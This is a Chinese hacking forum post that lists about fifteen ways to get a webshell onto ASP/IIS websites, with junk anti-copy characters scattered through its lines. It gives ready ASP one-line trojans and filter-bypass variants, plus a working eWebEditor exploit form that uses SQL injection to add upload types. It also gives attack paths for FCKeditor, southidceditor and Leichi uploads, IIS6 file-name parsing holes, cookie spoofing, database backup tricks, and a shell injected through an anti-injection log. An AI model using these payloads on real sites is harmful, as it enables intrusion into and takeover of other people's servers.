- 帖子
- 228
- 积分
- 645
- 威望
- 810
- 金钱
- 1192
- 在线时间
- 63 小时
|
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式9 P% m3 v+ A+ ^) ]* A+ F6 `
* e/ l, u) S8 E* w+ j
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试<%eval request("value")%>来突破,例如config.asp2 ~ J9 f1 S$ T. u# f$ R
: L, S9 j/ C- y, J0 e! f; h7 o- D
3.上传漏洞:
5 Y0 ?4 a% m8 G F0 ^" ^: x% A% z
6 p) C( V! |4 [+ V: J动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x000 Q# g' l$ u5 G3 l% a9 t! w5 l
; T/ V8 b( J7 }) A8 P逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件: U2 f1 ^' H8 J9 a
* \8 Y) _& h& ~( V' F& D( W% z; `
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
1 f4 p! _/ r2 I4 t/ ]* \' o然后在上传文件里面填要传的图片格式的ASP木马( P) r; f [; {, D6 O+ B$ h4 b
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp9 I9 c4 M2 B0 r1 T5 Y/ ^+ F
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传% h5 |: ^" M0 u; G
8 t) `( E% J. p; S) s3 i( G
<html>9 g# _/ B# P2 T& t) B8 J. d
<head>
; w/ d) N! p) X1 v<title>ewebeditor upload.asp上传利用</title>- `; J( H4 m! x- @4 N2 Z
</head> P2 L7 [& [' [( S+ B! I% {4 }2 Z
<body>0 Z/ c8 h1 ^/ q0 c
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">! F; U1 y O2 ^7 H& R2 H3 L
<input type=file name=uploadfile size=100><br><br> }* e: u U! [) L( m8 q
<input type=submit value=Fuck>
/ f1 Q; G a8 u, `3 L5 o0 v' w. i</form>
9 f. R' e5 z/ R* g</body>
) l ]: d" j, f4 k</form>
* H8 V( C% b% [, m+ f</html>
( _, U( r- a1 {
8 |" a. U5 `+ r; d& \2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
; J3 n- q7 p) R/ n( v/ [; \5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp0 p8 \ d( I! |* Q0 c6 Q7 Y
B: {, _8 Y+ d: `利用windows2003解析。建立zjq.asp的文件夹
! j1 V q! q, c D/ s+ q! ~" F; }3 x- g: |6 ?" _
6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型1 @6 N. m. Q7 ^4 K$ A
" C/ Q4 a' X: R2 [. b, C7.cuteeditor:类似ewebeditor
0 R1 v# z$ U' a7 M3 L+ d0 W# _8 Z* B' E6 K, G/ s5 Z
8.htmleditor:同上
( t# C" ]1 I( |/ g- ~% o8 J( {9 P8 B3 F: T2 j/ B& F( R3 }& M7 \
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
. o% ^3 }& I; g. l0 V: y3 v% P* k0 O
7 }% J( u# J. m3 T& Z3 V! p<%execute request("value")%><%'<% loop <%:%>
' n' ]! t! Z3 Z% I5 g5 \. o; g1 n: S+ ?$ s: e8 N
<%'<% loop <%:%><%execute request("value")%>
6 _6 s% F! f+ O( g4 c
' I# s! a9 h( }* ~0 e<%execute request("value")'<% loop <%:%>& y2 k% {3 |3 w
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
, A+ p. f$ J- d1 b2 L+ M( ]. F
3 X! Y& n$ z/ {6 B; ?10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞# ^. t+ v, ?, K4 h; t' O
- _- C' R! m6 A( j V5 w; z
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
6 Y! ^- x, B) s' Q6 x
, F/ S' |5 N6 P) ?解析漏洞得到webshell
1 G1 m6 D! c4 ^1 l
6 L1 t6 {* M- z( e12.mssql差异备份,日志备份,前提需知道web路径
( z/ [7 p- m9 k$ {$ D. i. C! \# [' h1 M* |
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell$ Y' E- n& j3 A
. F b5 g; P) r
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
# [. U" m) d; J* r* q, _3 U8 W2 t. ~: L. }4 ]1 V" J' C
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
2 k8 J, ~0 o. D% ]! c7 X! L* d ~$ U
以上只是本人的一些拙见,并不完善,以后想到了再继续添加
& i$ o$ Q; c6 O5 [ W$ H2 V不是我原创。我的朋友,飞鸟游鱼原创的 |
-
2
评分人数
-
|